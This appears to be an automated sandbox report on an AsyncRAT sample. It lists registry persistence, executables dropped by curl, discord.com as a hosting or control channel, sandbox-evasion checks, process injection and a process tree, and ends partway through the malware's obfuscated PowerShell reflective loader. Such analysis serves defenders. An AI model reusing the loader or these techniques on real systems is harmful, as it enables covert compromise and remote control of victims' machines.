asyncrat | 23873dba0e67fba174146cc0dfe7c73faf44315447ccb7ce39e3e4eb7a7bc812

Modify Registry

T1112

Processes:

WaaSMedicAgent.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

$77-scchost.exe$77-penisware.exe$77-sdchost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	$77-scchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	$77-penisware.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	$77-sdchost.exe

Executes dropped EXE 7 IoCs

Processes:

$77-sdchost.exe$77-scchost.exe$77-penisware.exe$77-penisware2.exe$77-install.exe$77-penisware2.exe$77-sachost.exe

pid	process
3664	$77-sdchost.exe
1572	$77-scchost.exe
4620	$77-penisware.exe
1624	$77-penisware2.exe
3996	$77-install.exe
4664	$77-penisware2.exe
2260	$77-sachost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

Processes:

$77-sdchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe"	$77-sdchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 discord.com
2 discord.com

flow	ioc
1	discord.com
2	discord.com

Drops file in System32 directory 4 IoCs

Processes:

svchost.exepowershell.EXE$77-penisware2.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf	$77-penisware2.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4876 set thread context of 4560 4876 powershell.EXE dllhost.exe

description	pid	process	target process
PID 4876 set thread context of 4560	4876	powershell.EXE	dllhost.exe

Drops file in Windows directory 5 IoCs

Processes:

curl.execurl.execurl.execurl.execurl.exe

description	ioc	process
File created	C:\Windows\Resources\$77-sdchost.exe	curl.exe
File created	C:\Windows\Resources\$77-scchost.exe	curl.exe
File created	C:\Windows\Resources\$77-penisware.exe	curl.exe
File created	C:\Windows\Resources\$77-penisware2.exe	curl.exe
File created	C:\Windows\Resources\$77-install.exe	curl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

wmiprvse.exemousocoreworker.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2664 schtasks.exe
3424 schtasks.exe
372 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4432 timeout.exe
2252 timeout.exe

pid	process
2664	schtasks.exe
3424	schtasks.exe
372	schtasks.exe

pid	process
4432	timeout.exe
2252	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

wmiprvse.exemousocoreworker.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 55 IoCs

Processes:

powershell.EXEdllhost.exesvchost.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	dllhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02lzqkrjhloklxgj\Provision Monday, June 17, 2024 21:32:12 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaO8Q6AKaiEeDrQoeRrzyhQAAAAACAAAAAAAQZgAAAAEAACAAAAA8WDSkwKy9Lf9V0DuxJZ6nU0p6SvhxInIcM1hBu92coQAAAAAOgAAAAAIAACAAAAAgMp8Chkk6W4gnKZB4/129bjj5EFYLIqMdS3WsSfhYcyAAAACNEMdPOzcXtGx56YawF4zZHfEWz80M7u2cB5MHhA6qL0AAAADiXB5QNj9gVEoI4mBriO1n2JEmCb/IQDSadUGy4b7BxWlxRKOBB8kXzwKqa6MsYlzq+9mrAQDjvy4crBYVnkvw"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02xcukljkubeqild\Provision Monday, June 17, 2024 21:32:12 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaO8Q6AKaiEeDrQoeRrzyhQAAAAACAAAAAAAQZgAAAAEAACAAAADxYftXFsGfnAJjL+zuoOAzaqx5ytFEclV1KEb01sn0ZgAAAAAOgAAAAAIAACAAAAAKGsY2Mm4iNjMQ5Vkzy31ieOWbGTL92BsBS2Bh5A36zCAAAACtKFNe8EadlhsD9XPff09BvstwNBFm4QZ5WjVUJvnKeEAAAAAHzY4pJBriJGBKQgpfQ59ZE5JtnN/YTVbtl78Lrp+vDcYGkg7V0wSGAS1hfLzP39ycrc7ANdS89jZKzfEIL5v8"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02pmcrkqfhzepqip	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02xcukljkubeqild	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	dllhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nydgkaqyxlqaog\Provision Monday, June 17, 2024 21:32:13 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaO8Q6AKaiEeDrQoeRrzyhQAAAAACAAAAAAAQZgAAAAEAACAAAACMc62JJsO7RhBuGrguHTjiH675R9DSEEXANA4h5boo6QAAAAAOgAAAAAIAACAAAABI8qpVpI0LoRZDgTNUBqaYJXbRGsgFSVXgs+THsh3npyAAAABNTvBFCHwTbZd/SKKbJChwr+fnGESwLdwCGFy2O6tYsEAAAACGTLsnYC1m2S/ZOj5hfMeTswS3W5K6QXwfjSGMXO7MjxADJvlFHqJYGWdxBKAiQK8Rz8/ELcuiCwUpAzSlMU1I"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02lzqkrjhloklxgj	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02pmcrkqfhzepqip\Provision Monday, June 17, 2024 21:32:13 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAaO8Q6AKaiEeDrQoeRrzyhQAAAAACAAAAAAAQZgAAAAEAACAAAADvmcAs3qtdXE75Hyqd+vnEX9mpwX7sy1HdXwRYLWhKNgAAAAAOgAAAAAIAACAAAACZel0pcmLxvGdglskw2KE7VD2kRYJh8Qr8Icso4riYoCAAAADNy/E2F5Wj+Gpus9yAOTZtAyj51g5c9xee8ZWrCDdX/EAAAADdct1cdmw+9I6FEzy4rDE3bdlYUmF6wd5UiOyNVf+lSAddwbiI33PMbdHdx4H91/r4SVtaHMYjQJKLYpUPAXC0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02nydgkaqyxlqaog	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

$77-penisware2.exe$77-scchost.exepowershell.EXEdllhost.exe$77-penisware2.exe

pid	process
1624	$77-penisware2.exe
1624	$77-penisware2.exe
1624	$77-penisware2.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
4876	powershell.EXE
4876	powershell.EXE
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
1572	$77-scchost.exe
4876	powershell.EXE
4876	powershell.EXE
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4664	$77-penisware2.exe
4664	$77-penisware2.exe
4560	dllhost.exe
4560	dllhost.exe
4664	$77-penisware2.exe
4560	dllhost.exe
4560	dllhost.exe
1624	$77-penisware2.exe
1624	$77-penisware2.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe
4560	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

$77-penisware2.exe$77-penisware.exe$77-sdchost.exe$77-scchost.exepowershell.EXEdllhost.exe$77-penisware2.exesvchost.exewmiprvse.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1624	$77-penisware2.exe
Token: SeDebugPrivilege	4620	$77-penisware.exe
Token: SeDebugPrivilege	3664	$77-sdchost.exe
Token: SeDebugPrivilege	1572	$77-scchost.exe
Token: SeDebugPrivilege	3664	$77-sdchost.exe
Token: SeDebugPrivilege	4620	$77-penisware.exe
Token: SeDebugPrivilege	1572	$77-scchost.exe
Token: SeDebugPrivilege	4876	powershell.EXE
Token: SeDebugPrivilege	4876	powershell.EXE
Token: SeDebugPrivilege	4560	dllhost.exe
Token: SeDebugPrivilege	4664	$77-penisware2.exe
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe
Token: SeTakeOwnershipPrivilege	2600	svchost.exe
Token: SeLoadDriverPrivilege	2600	svchost.exe
Token: SeSystemtimePrivilege	2600	svchost.exe
Token: SeBackupPrivilege	2600	svchost.exe
Token: SeRestorePrivilege	2600	svchost.exe
Token: SeShutdownPrivilege	2600	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	svchost.exe
Token: SeUndockPrivilege	2600	svchost.exe
Token: SeManageVolumePrivilege	2600	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe
Token: SeTakeOwnershipPrivilege	2600	svchost.exe
Token: SeLoadDriverPrivilege	2600	svchost.exe
Token: SeSystemtimePrivilege	2600	svchost.exe
Token: SeBackupPrivilege	2600	svchost.exe
Token: SeRestorePrivilege	2600	svchost.exe
Token: SeShutdownPrivilege	2600	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	svchost.exe
Token: SeUndockPrivilege	2600	svchost.exe
Token: SeManageVolumePrivilege	2600	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe
Token: SeTakeOwnershipPrivilege	2600	svchost.exe
Token: SeLoadDriverPrivilege	2600	svchost.exe
Token: SeSystemtimePrivilege	2600	svchost.exe
Token: SeBackupPrivilege	2600	svchost.exe
Token: SeRestorePrivilege	2600	svchost.exe
Token: SeShutdownPrivilege	2600	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	svchost.exe
Token: SeUndockPrivilege	2600	svchost.exe
Token: SeManageVolumePrivilege	2600	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe
Token: SeTakeOwnershipPrivilege	2600	svchost.exe
Token: SeLoadDriverPrivilege	2600	svchost.exe
Token: SeSystemtimePrivilege	2600	svchost.exe
Token: SeBackupPrivilege	2600	svchost.exe
Token: SeRestorePrivilege	2600	svchost.exe
Token: SeShutdownPrivilege	2600	svchost.exe
Token: SeSystemEnvironmentPrivilege	2600	svchost.exe
Token: SeUndockPrivilege	2600	svchost.exe
Token: SeManageVolumePrivilege	2600	svchost.exe
Token: SeDebugPrivilege	4744	wmiprvse.exe
Token: SeAuditPrivilege	2536	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2600	svchost.exe
Token: SeIncreaseQuotaPrivilege	2600	svchost.exe
Token: SeSecurityPrivilege	2600	svchost.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

$77-penisware2.exe$77-penisware2.exe

pid process

1624 $77-penisware2.exe
4664 $77-penisware2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 2432 wrote to memory of 3832	2432	cmd.exe	chcp.com
PID 2432 wrote to memory of 3832	2432	cmd.exe	chcp.com
PID 2432 wrote to memory of 668	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 668	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 4520	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 4520	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 2440	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 2440	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 3000	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 3000	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 4724	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 4724	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 3660	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 3660	2432	cmd.exe	curl.exe
PID 2432 wrote to memory of 2160	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2160	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 1988	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 1988	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2860	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2860	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2708	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2708	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 3772	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 3772	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 5016	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 5016	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2928	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2928	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2632	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2632	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 3300	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 3300	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 3492	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 3492	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2400	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2400	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 908	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 908	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2380	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2380	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2176	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2176	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 1044	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 1044	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 4032	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 4032	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2336	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2336	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 4044	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 4044	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 1996	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 1996	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 4272	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 4272	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 1752	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 1752	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 1416	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 1416	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 4444	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 4444	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 3200	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 3200	2432	cmd.exe	reg.exe
PID 2432 wrote to memory of 2628	2432	cmd.exe	cmd.exe
PID 2432 wrote to memory of 2628	2432	cmd.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:388

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e1ba08b3-a4d3-4c32-955a-134170485390}
2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4560

C:\Windows\Resources\$77-penisware2.exe
"C:\Windows\Resources\$77-penisware2.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4664

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
PID:612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1216

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nOgvgZQkzbuj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vnzInwxdNVlxkR,[Parameter(Position=1)][Type]$TIDcXxbMPT)$NXjPmyfoVuP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+''+','+''+'P'+'u'+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'Se'+'a'+'l'+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'siC'+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+','+'A'+[Char](117)+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$NXjPmyfoVuP.DefineConstructor('R'+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+'yS'+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vnzInwxdNVlxkR).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[